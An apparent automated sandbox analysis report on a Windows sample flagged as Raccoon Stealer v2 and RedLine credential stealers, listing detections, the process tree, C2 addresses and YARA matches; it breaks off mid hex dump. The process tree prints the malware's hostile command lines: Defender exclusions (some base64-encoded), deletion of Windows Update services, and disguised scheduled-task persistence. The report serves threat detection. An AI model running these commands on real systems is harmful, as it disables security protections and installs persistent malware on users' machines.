Edit tour

Windows Analysis Report
N2wufLmC74.exe

Overview

General Information

Sample Name:	N2wufLmC74.exe
Analysis ID:	760354
MD5:	a55758362b29072504453d64e5d475cd
SHA1:	5fa4b6cf5496e22791a0840cba5074e9a25eea16
SHA256:	ed75d66b5d971ec01613881d3e088081222411e8315428e6cb049d5699ce31bc
Tags:	exeRecordBreaker
Infos:

Detection

Raccoon Stealer v2, RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Sigma detected: Stop multiple services

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Snort IDS alert for network traffic

Yara detected Raccoon Stealer v2

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Connects to many ports of the same IP (likely port scanning)

Uses cmd line tools excessively to alter registry or file data

Encrypted powershell cmdline option found

Allocates memory in foreign processes

Injects a PE file into a foreign processes

DLL side loading technique detected

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Contains functionality to inject code into remote processes

Adds a directory exclusion to Windows Defender

Found many strings related to Crypto-Wallets (likely being stolen)

Drops executables to the windows directory (C:\Windows) and starts them

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Uses powercfg.exe to modify the power settings

Sample uses process hollowing technique

Modifies power options to not sleep / hibernate

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

.NET source code references suspicious native API functions

Found hidden mapped module (file has been removed from disk)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Potential dropper URLs found in powershell memory

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Sleep loop found (likely to delay execution)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Uses reg.exe to modify the Windows registry

PE file contains more sections than normal

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Detected TCP or UDP traffic on non-standard ports

PE / OLE file has an invalid certificate

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

N2wufLmC74.exe (PID: 6060 cmdline: C:\Users\user\Desktop\N2wufLmC74.exe MD5: A55758362B29072504453D64E5D475CD)

conhost.exe (PID: 6024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vbc.exe (PID: 2416 cmdline: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)

conchsvt.exe (PID: 5232 cmdline: "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" MD5: 68E3359674EE7D49550B09E7FF69DCCE)

cmd.exe (PID: 2228 cmdline: "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 2068 cmdline: schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

brave.exe (PID: 5184 cmdline: "C:\Users\user\AppData\Local\Google\brave.exe" MD5: 9253ED091D81E076A3037E12AF3DC871)

powershell.exe (PID: 5252 cmdline: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 1840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4560 cmdline: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

sc.exe (PID: 3776 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 5824 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 5768 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 5244 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)

sc.exe (PID: 1176 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)

reg.exe (PID: 5420 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 5400 cmdline: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f MD5: E3DACF0B31841FA02064B4457D44B357)

cmd.exe (PID: 3956 cmdline: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

powershell.exe (PID: 1852 cmdline: powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' } MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ofg.exe (PID: 244 cmdline: "C:\Users\user\AppData\Local\Google\ofg.exe" MD5: 33DAD992607D0FFD44D2C81FE67F8FB1)

schtasks.exe (PID: 684 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 3956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

conhost.exe (PID: 3600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powercfg.exe (PID: 1708 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 4780 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 3780 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

powercfg.exe (PID: 4044 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5)

chrome.exe (PID: 6028 cmdline: "C:\Users\user\AppData\Local\Google\chrome.exe" MD5: 8CD1EA50F8F4C45055400E70DA52B326)

powershell.exe (PID: 5116 cmdline: powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 2348 cmdline: powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 732 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5716 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

GoogleUpdate.exe (PID: 1004 cmdline: C:\Windows\GoogleUpdate.exe MD5: 9A66A3DE2589F7108426AF37AB7F6B41)

GoogleUpdate.exe (PID: 5320 cmdline: C:\Windows\GoogleUpdate.exe MD5: 9A66A3DE2589F7108426AF37AB7F6B41)

zonewar.exe (PID: 4984 cmdline: "C:\Users\user\AppData\Local\Temp\zonewar.exe" MD5: B5CC85BB2FCFA979BC843618C0119D05)

conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vbc.exe (PID: 5316 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)

conchsvt.exe (PID: 3388 cmdline: C:\Users\user\AppData\Local\Microsoft\conchsvt.exe MD5: 68E3359674EE7D49550B09E7FF69DCCE)

cmd.exe (PID: 5220 cmdline: "cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 4980 cmdline: schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\Local\Microsoft\conchsvt.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

ofg.exe (PID: 5360 cmdline: C:\Users\user\AppData\Local\Google\ofg.exe MD5: 33DAD992607D0FFD44D2C81FE67F8FB1)

schtasks.exe (PID: 2820 cmdline: SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

chrome.exe (PID: 1504 cmdline: C:\Users\user\AppData\Local\Google\chrome.exe MD5: 8CD1EA50F8F4C45055400E70DA52B326)

cleanup

Malware Configuration

Threatname: Raccoon

{"C2 url": ["http://77.73.133.23/"], "Bot ID": "e8691a1373ef1dd5c4f2e66fb9b58b3b", "RC4_key1": "e8691a1373ef1dd5c4f2e66fb9b58b3b"}

Threatname: RedLine

{"C2 url": ["45.15.157.131:36457"], "Authorization Header": "606dcc33642899c9397bfd41c8c9962f"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Google\ofg.exe	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute

Memory Dumps

Source	Rule	Description	Author
00000035.00000003.411328644.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000027.00000002.356932186.0000000000C28000.00000004.00000001.01000000.0000000D.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000035.00000002.461676500.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000035.00000003.401199207.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000035.00000003.361688303.0000000000D78000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000003.240125643.0000000000A02000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000035.00000003.360195096.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000035.00000003.424318704.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000027.00000003.355141479.0000000000C90000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
00000002.00000002.370855427.0000000007527000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000035.00000002.458015217.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.385441891.00000000077F7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: N2wufLmC74.exe PID: 6060	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: vbc.exe PID: 2416	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: vbc.exe PID: 2416	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vbc.exe PID: 5316	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
39.2.zonewar.exe.c20000.0.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
22.0.ofg.exe.d00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
59.0.GoogleUpdate.exe.2d0000.0.unpack	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x16ac5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16dd5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x170b1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x173a1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17691:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17995:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17c81:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17f79:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18279:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18561:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18849:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18b31:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18e35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19141:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1943d:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19739:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19a29:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x19d35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a025:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a305:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x1a611:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ...
39.3.zonewar.exe.c90000.0.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
26.2.ofg.exe.d00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x122c9:$r1: Classes\Folder\shell\open\command 0x122ec:$k1: DelegateExecute
39.3.zonewar.exe.c90000.0.raw.unpack	JoeSecurity_RaccoonV2	Yara detected Raccoon Stealer v2	Joe Security
51.0.GoogleUpdate.exe.2d0000.0.unpack	SUSP_Unsigned_GoogleUpdate	Detects suspicious unsigned GoogleUpdate.exe	Florian Roth	0x16ac5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x16dd5:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x170b1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x173a1:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17691:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17995:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17c81:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x17f79:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18279:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18561:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18849:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18b31:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78 ... 0x18e35:$ac1: 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55 00 70 00 64 00 